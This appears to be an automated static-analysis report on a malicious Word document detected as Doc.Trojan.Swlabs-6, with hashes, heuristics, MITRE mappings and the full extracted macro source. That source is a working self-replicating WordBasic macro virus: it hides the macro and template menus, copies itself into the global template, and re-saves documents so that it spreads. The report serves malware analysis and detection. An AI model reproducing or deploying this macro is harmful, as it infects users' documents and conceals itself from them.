Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f515b8e9826cc153…

MALICIOUS

Office (OLE)

33.5 KB Created: 1999-09-02 13:56:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 836b7edee9168b1aa009ef9915cb9832 SHA-1: ca653da55b027dba41fc2ff65ab65260bcd2c89d SHA-256: f515b8e9826cc1537eb99a7301f51068456d704bb4141038c3decd3cca3a4f04
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing a legacy WordBasic macro. The macro's primary function appears to be self-replication and saving the document in a macro-enabled format, indicated by the `MacroCopy` and `FileSaveAs Format:=1` commands. This behavior suggests an attempt to ensure the macro persists or can be easily executed in subsequent stages, potentially as part of a larger malware delivery chain. The presence of legacy macro virus markers and the AutoOpen subroutine further support this malicious intent.

Heuristics 4

  • ClamAV: Doc.Trojan.Swlabs-6 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Swlabs-6
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "aUToOpEn"

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1218 bytes
SHA-256: b8040ac1a9ee8feee995ef15590442ded12f0431b4bf7950ccf4c5140c14f228
Detection
ClamAV: Doc.Trojan.Swlabs-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "aUToOpEn"

Public Sub MAIN()
Dim FName$
Dim MacName$
Rem SkamWerks Labs Presents the Generic Concept Created by Skam

On Error GoTo -1: On Error GoTo ErrorHandler

     WordBasic.ToolsCustomizeMenus ResetAll:=1
     WordBasic.ToolsCustomizeMenus Name:="FileTemplates", Menu:="&File", Context:=0, Remove:=1
     WordBasic.ToolsCustomizeMenus Name:="ToolsMacro", Menu:="&Tools", Context:=0, Remove:=1

     Rem What? No Payload?  WUSSY!

     FName$ = WordBasic.[FileName$]()
     MacName$ = FName$ + ":aUToOpEn"

     WordBasic.MacroCopy MacName$, "Global:aUToOpEn"

ErrorHandler:

On Error GoTo -1: On Error GoTo aUToOpEnHandler
     MacName$ = FName$ + ":aUToOpEn"
     WordBasic.MacroCopy "Global:aUToOpEn", MacName$
aUToOpEnHandler:
    
WordBasic.FileSaveAs Format:=1

Rem Virii Unite!J

On Error GoTo -1: On Error GoTo 0:
On Error GoTo -1: On Error GoTo EndCode:



EndCode:

End Sub